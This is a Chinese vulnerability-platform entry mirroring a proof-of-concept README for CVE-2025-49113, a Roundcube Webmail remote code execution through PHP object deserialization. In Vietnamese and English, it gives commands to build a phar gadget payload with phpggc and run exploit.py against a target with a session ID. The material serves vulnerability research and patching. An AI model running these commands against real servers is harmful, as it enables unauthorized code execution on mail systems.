漏洞平台

POC详情： 131efeaf7c7e5dc6b1423204503887427c2dd7ce

来源

https://github.com/Yuri08loveElaina/CVE-2025-49113

关联漏洞

标题： Roundcube Webmail 安全漏洞 (CVE-2025-49113)
描述：Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端，它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞，该漏洞源于未验证_from参数，可能导致PHP对象反序列化攻击。

描述

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

介绍

## VIETNAMESE ##

- ## ✅ Tính năng: ##

>Hỗ trợ upload payload.phar

>Tự động đoán path nếu không biết chính xác

>Cho phép sử dụng phar:// path tùy chọn

>Có tùy chọn --upload-payload, --auto-path, --direct-path

- ## 🧪 Cách dùng: ##
- 1. Tạo payload:

>phpggc monolog/rce1 system 'id' -p phar -o payload.phar

- 2. Upload và khai thác tự động:

>python3 exploit.py https://target.com  SESSIONID  --upload-payload payload.phar --auto-path

- 3. Upload và tự nhập path nếu biết chính xác đường dẫn :

>python3 exploit.py https://target.com  SESSIONID  --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

- 4. Không upload, chỉ khai thác:

>python3 exploit.py https://target.com  SESSIONID  --direct-path /var/www/html/temp/payload.phar

>✅ Bạn có thể thay  SESSIONID  bằng session hợp lệ của Roundcube.
 
## ENGLISH ##
- ## ✅ Features: ##

>Support uploading payload.phar

>Automatically guess the path if not exactly known

>Allow the use of phar:// path option

>There are options --upload-payload, --auto-path, --direct-path

- ## 🧪 How to use: ##
- 1. Create payload:

>phpggc monolog/rce1 system 'id' -p phar -o payload.phar

- 2. Upload and exploit automatically:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path

- 3. Upload and enter the path yourself if you know the exact path:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

- 4. Do not upload, just exploit:

>python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar

- ✅ You can replace SESSIONID with a valid Roundcube session.

文件快照


 [4.0K]  /data/pocs/131efeaf7c7e5dc6b1423204503887427c2dd7ce
├── [2.7K]  exploit.py
└── [1.7K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。